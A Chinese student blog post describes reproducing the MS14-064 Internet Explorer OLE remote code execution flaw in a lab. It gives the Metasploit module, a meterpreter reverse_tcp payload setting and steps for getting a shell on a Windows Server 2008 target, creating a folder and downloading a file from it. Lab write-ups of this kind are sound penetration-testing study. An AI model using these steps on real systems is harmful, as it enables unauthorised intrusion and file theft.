ms14-064漏洞复现

本博客最先发布于我的个人博客,如果方便,烦请移步恰醋的小屋查看,谢谢您!

这是我在实验室学习渗透测试的第五个漏洞复现,一个多小时便完成了。学长给的要求只需完成查看靶机信息、在指定位置创建文件夹两项操作,我在看别的博客时发现还可以利用该漏洞窃取文件,因此也自己尝试了以下,写在了博客的最后。

漏洞介绍

MS14-064为Windows OLE自动化阵列远程代码执行漏洞。当IE不作访问内存中的对象时,存在远程代码执行漏洞。OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,远程攻击者利用此漏洞通过构造的网站执行任意代码,用户使用IE浏览器查看该网站时允许远程执行代码。

受影响的产品有:

  • Windows Server 2003
  • Windows Server 2008
  • Windows Server 2008 R2
  • Windows Vista
  • Windows XP
  • Windows 7
  • Windows 8
  • Windows 8.1
  • Windows Server 2012
  • Windows Server 2012 R2
  • Windows RT
  • Windows RT 8.1

实验环境

攻击机:Kali Linux: 192.168.227.128

靶机:Windows Server 2008: 192.168.227.130

复现步骤

  1. 使用msfconsole命令启动msf,搜索ms14-064的漏洞信息:

  2. 使用第一个攻击模块,设置载荷

    use exploit/windows/browser/ms14_064_ole_code_execution # 使用第一个攻击模块
    show payloads # 查看有效的攻击载荷
    set payload windows/meterpreter/reverse_tcp # 设置反弹连接shell
    

    之后使用show options命令查看需要进行的设置。其中,AllowPowershellPrompt、SRVHOST和LHOST需要修改。AllowPowershellPrompt改为true,其余两个改为攻击机IP。设置完成后,使用exploit命令生成恶意网站。

  3. 使用靶机用IE浏览器打开生成的恶意链接

  4. 返回Kali,已经生成了一个连接session了,按一下回车,输入sessions -i 1连接,入侵靶机,打开shell,如果乱码,则使用chcp 65001改变编码,然后输入whoami查看当前用户。(第一次失败了,我推断可能是修改了编码的原因,因为第二次打开shell后没有修改编码,发现成功了,之后又尝试了修改编码后输入whoami,依然不成功)

  5. 尝试在桌面上创建一个名为test的文件夹:

    返回windows server 2008查看,桌面上已经出现了相应的文件夹:

  6. 尝试从靶机窃取文件
    在桌面创建一个名为secret的文件夹:

    使用dir命令查看,存在secret.txt文件,返回meterpreter,使用download命令下载文件:

    下载完成后,在目标目录下查看,存在,说明窃取成功:

原文地址:https://www.cnblogs.com/Alleyn180400524/p/13525440.html